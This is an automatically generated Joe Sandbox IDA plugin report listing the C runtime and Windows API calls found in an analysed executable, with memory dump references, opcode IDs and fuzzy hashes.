                                                                                                                                                                                                                                                                • Opcode ID: adfe9232b77463faea1720595a1aa2fd1f82acaf584dc161fc536f59d9c874c2
                                                                                                                                                                                                                                                                • Instruction ID: 25080428a21125f59c424ce893c6e0a5bc69529afb6788eddbd93dac9b15c2cc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adfe9232b77463faea1720595a1aa2fd1f82acaf584dc161fc536f59d9c874c2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E451A672900246AFEF22AF62DCC5EBB7AADEF44710F960539FD04DA151EB34DC5096A0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00333017
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00333022
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00333090
                                                                                                                                                                                                                                                                  • Part of subcall function 00332EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00332EFC
                                                                                                                                                                                                                                                                • std::locale::_Setgloballocale.LIBCPMT ref: 0033303D
                                                                                                                                                                                                                                                                • _Yarn.LIBCPMT ref: 00333053
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                • Opcode ID: 2062838bad451c5e0d9b5c7bf8e62c44c656eca0a02e36797728c0d1e9e94f13
                                                                                                                                                                                                                                                                • Instruction ID: 01f33944cef2dc9be6af8024aa5c5565985df18ff89244a889aed25ca3591d7a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2062838bad451c5e0d9b5c7bf8e62c44c656eca0a02e36797728c0d1e9e94f13
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66018FB6A002249BCB0BEF60D88697D7B75FF85341F154409E8125B3A1DF34AE42CB81
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00347F2E,00000000,?,00356E10,?,?,?,00347E65,00000004,InitializeCriticalSectionEx,0034E57C,0034E584), ref: 00347E9F
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00347F2E,00000000,?,00356E10,?,?,?,00347E65,00000004,InitializeCriticalSectionEx,0034E57C,0034E584,00000000,?,0033E1DC), ref: 00347EA9
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00347ED1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                • Opcode ID: 3d0dd7108fbec4753c5da21c2366a16f5d270be1a17453f333e4f18fe46ec239
                                                                                                                                                                                                                                                                • Instruction ID: 987a0315bf1dc2fd44ee6a9f40c565b39edb45184c46b2b5de10bc2f7845544a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d0dd7108fbec4753c5da21c2366a16f5d270be1a17453f333e4f18fe46ec239
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E04870284309B7DB131B61DC06F593B9DDB10B91F104060FE0DBC4F1D761AD9096C4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(825BC0CB,00000000,00000000,?), ref: 00345690
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003458E2
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00345928
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 003459CB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                • Opcode ID: 4b5be69ff0b3e373e4b68c35f79950b107c921f51e07b63bd0e6d15e764e9b8a
                                                                                                                                                                                                                                                                • Instruction ID: ff26c1c1485af013368e001f5bc4d6890e98318e58dc556e4815fb2025fb6a12
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b5be69ff0b3e373e4b68c35f79950b107c921f51e07b63bd0e6d15e764e9b8a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AD16B75E04648DFCB16CFA8D8809ADBBF9FF49310F24452AE456EB352D730A946CB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                • Opcode ID: 0cc05b05e44073f234892ba2de31e5f7d0fda9845f41aac7e7875cc3a945623c
                                                                                                                                                                                                                                                                • Instruction ID: 73d27788cc7b1538f42214c9b23418ce1bd0bdafee5620fa0bd44376dcdd11d5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cc05b05e44073f234892ba2de31e5f7d0fda9845f41aac7e7875cc3a945623c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86510472A04606AFDB2B9F14E8C1B7AB7B4FF01311F15412DE8429B6A1E731ED80CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0034359B
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 003435A2
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 003435DC
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 003435E3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                • Opcode ID: 82b7aec3c82a4419c36cbb69558017271dee84ca6fb82889816c02f2922bca46
                                                                                                                                                                                                                                                                • Instruction ID: 6a25f544a8b9b1920370be5020e40ff272eafe5c8c813a8f76c5a6d121860de0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b7aec3c82a4419c36cbb69558017271dee84ca6fb82889816c02f2922bca46
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A21A471600605AFDB23AF66988182ABBECFF01364B118559F8659F651DB30FF508B91
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: b0bc5bb96e1696a756c57f365d3bef71fb55f788b86603f234616493c0c017e6
                                                                                                                                                                                                                                                                • Instruction ID: d31d615f1226ce521cfc43d5649b81497c4eff1d6395b28d64e41bff67f054ff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0bc5bb96e1696a756c57f365d3bef71fb55f788b86603f234616493c0c017e6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC21DCB1604705BFDB27AF618CC092AB7ACAF00364F118628F8699B651EF30EC0087A1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00344857
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2
                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0034488F
                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003448AF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                                                                                                                • Opcode ID: 254cfb3144ce863b9b9c333f5fe3227bd70ff753bea05b1f816174b8e0567cff
                                                                                                                                                                                                                                                                • Instruction ID: 2e50263731bb21d20e5fe0fa46e9942daa594fde1c7e61aca3e97969d86c41e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 254cfb3144ce863b9b9c333f5fe3227bd70ff753bea05b1f816174b8e0567cff
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 981126F65026657FA71327B69CCEEBF29ACDE853D5B200434F401D9141FB65EE0192B1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00334582
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0033458C
                                                                                                                                                                                                                                                                  • Part of subcall function 003324C2: std::_Lockit::_Lockit.LIBCPMT ref: 003324DE
                                                                                                                                                                                                                                                                  • Part of subcall function 003324C2: std::_Lockit::~_Lockit.LIBCPMT ref: 003324F7
                                                                                                                                                                                                                                                                • codecvt.LIBCPMT ref: 003345C6
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 003345FD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3716348337-0
                                                                                                                                                                                                                                                                • Opcode ID: 679212265b0f81e3c6584279bfab36ffe19e452300f9c3b3da9cd787ddf47b3f
                                                                                                                                                                                                                                                                • Instruction ID: 4d60e1b9acd9c8826087f85ae69875ecba73944f3398a063c8a195f0ff47a95b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 679212265b0f81e3c6584279bfab36ffe19e452300f9c3b3da9cd787ddf47b3f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6101F575900615CBCF07EFA4D8966AEB7B5FF55710F250508F411AF2A1CF74AE018791
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000), ref: 0034A4F7
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?,?,?,00345365,00000000), ref: 0034A503
                                                                                                                                                                                                                                                                  • Part of subcall function 0034A554: CloseHandle.KERNEL32(FFFFFFFE,0034A513,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?,?), ref: 0034A564
                                                                                                                                                                                                                                                                • ___initconout.LIBCMT ref: 0034A513
                                                                                                                                                                                                                                                                  • Part of subcall function 0034A535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0034A4D1,00349AFC,?,?,00345A1F,?,00000000,00000000,?), ref: 0034A548
                                                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?), ref: 0034A528
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                • Opcode ID: 0e6bf7ff794dd99a039000b700b24ef6fde8d777093f90fce66060c619b5ce20
                                                                                                                                                                                                                                                                • Instruction ID: 850bfd324bc36171fc1b49dcc2a228f530fc84bd8c28ae0f736ecb2d530f0839
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e6bf7ff794dd99a039000b700b24ef6fde8d777093f90fce66060c619b5ce20
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CF03036050715BFCF231F95EC0999E3F6AFF893A2F014550FA498E130D63299209B92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 003359B9
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 003359C8
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 003359D1
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 003359DE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                • Opcode ID: 78749b24a949dfd4949240d1e60ba3c287da9ea0bbdcc9fa4d1d55dde0fc50a2
                                                                                                                                                                                                                                                                • Instruction ID: 7b426bf5a424b9a96f28fbde2b07c0eec278c19cad0528da278e384c862c67df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78749b24a949dfd4949240d1e60ba3c287da9ea0bbdcc9fa4d1d55dde0fc50a2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37F0AF70D1120CEBCB01DBB4C94999EFBF8FF1C301B914996A412E7120E730AB448F50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00339266,?,?,?,00000055,?,-00000050,?,?,?), ref: 003421D6
                                                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00339266,?,?,?,00000055,?,-00000050,?,?), ref: 0034220D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                                • String ID: utf8
                                                                                                                                                                                                                                                                • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                                • Opcode ID: adfb9526e472870a16e4e9f26ffbe9ce94682e5812a1a432f8e7c4eeefaf6d1d
